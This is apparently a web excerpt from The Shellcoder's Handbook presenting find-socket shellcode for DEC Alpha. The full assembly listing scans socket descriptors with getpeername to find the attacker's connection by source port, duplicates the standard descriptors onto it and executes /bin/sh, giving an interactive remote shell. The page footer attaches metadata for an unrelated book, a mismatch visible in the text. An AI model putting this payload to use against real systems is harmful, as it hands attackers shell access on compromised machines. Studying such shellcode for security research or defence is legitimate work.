Find-Socket Shellcode

Find-Socket Shellcode

Additionally, we can use the same methods to create find-socket shellcode. The following shellcode will reuse the already initiated tcp connection with the remote process, duplicate the stdio descriptors and execute the shell interpreter, thus creating an interactive telnet-like session for the attacker.

 #include <alpha/regdef.h> #include <alpha/pal.h>   .text   .arch    generic   .align 4   .globl   main   .ent     main main:   .frame  $sp, 0,                       #xorloop will give us the pc in a0 bic  sp, 0xf, sp     #make sure the stack is 16 byte aligned. addq a0, 0xa0, s4    #address of //bin/sh stq  s4, (sp)        #store address of //bin/sh stq  zero, 8(sp) mov  0x10, t0 stq  t0, 16(sp)      #sizeof(struct sockaddr_in) lda  s2, 16(sp)      #address of sizeof(struct sockaddr_in) lda  s1, 24(sp)      #address of sockaddr_in bis  zero, zero, s0 lda  s0, 0xff(zero)  #set counter for the getpeername loop. bis  zero, zero, s3  #zero out s3 mov  0x3412, s3      #src port of peer sll  s3, 0x30, s3 srl  s3, 0x30, s3     getpeerloop: mov  s0, a0          #socket number. mov  s1, a1          #address of sockaddr_in mov  s2, a2          #address of sizeof(struct sockaddr_in) addq zero, 0x8d, v0  #getpeername syscall. PAL_callsys bne  v0, again ldl  t0, 24(sp) sll  t0, 0x20, t0 srl  t0, 0x30, t0 subq t0, s3, t0 beq  t0, out         #check if we have a matching source port. again: subq s0, 0x1, s0 bge  s0, getpeerloop out:     mov 0x2, s2 duploop: mov  s0, a0          #socket number mov  s2, a1          #stdin, stdout, stderr addq zero, 0x5a, v0  #dup2 syscall PAL_callsys subq s2, 0x1, s2     #decrement the counter. bge  s2, duploop     #loop for 2,1,0 (stderr, stdout, stdin)     mov  s4, a0          #address of //bin/sh mov  sp, a1          #address of (address of //bin/sh) bis  zero, zero, a2  #NULL addq zero, 0x3b, v0  #execve syscall PAL_callsys     .long   0x00000000 .quad   0x68732f6e69622f2f .long   0x00000000 .end        main 


The Shellcoder's Handbook. Discovering and Exploiting Security
Hacking Ubuntu: Serious Hacks Mods and Customizations (ExtremeTech)
ISBN: N/A
EAN: 2147483647
Year: 2003
Pages: 198
Authors: Neal Krawetz

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net